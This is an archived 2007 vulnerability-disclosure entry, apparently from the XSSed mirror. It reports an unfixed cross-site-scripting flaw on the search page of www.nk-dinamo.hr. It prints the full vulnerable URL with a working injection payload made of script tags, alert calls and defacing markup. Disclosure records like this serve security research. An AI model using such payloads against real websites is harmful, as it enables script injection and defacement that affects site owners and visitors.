Unfixed XSS vulnerability at www.nk-dinamo.hr

2007-03-11T00:00:00
ID XSSED:24794
Type xssed
Reporter kaksii
Modified 2007-05-11T00:00:00

Description

Security researcher kaksii, has submitted on 03/11/2007 a cross-site-scripting (XSS) vulnerability affecting www.nk-dinamo.hr, which at the time of submission ranked 27894 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.nk-dinamo.hr/trazilica/Default.aspx?search="><script>alert(1)</script></textarea><script>alert("dinamo_sucks")<script>alert('kaksii_was_here');alert(1)</script>"</html><html><script>alert(10111)</script><div%20align=center>%20<font%20size=4><textarea%20name=1%20cols=100000%20rows=10000%20id=1>kaksii%20was%20here</textarea></font></div><noscript><plaintext>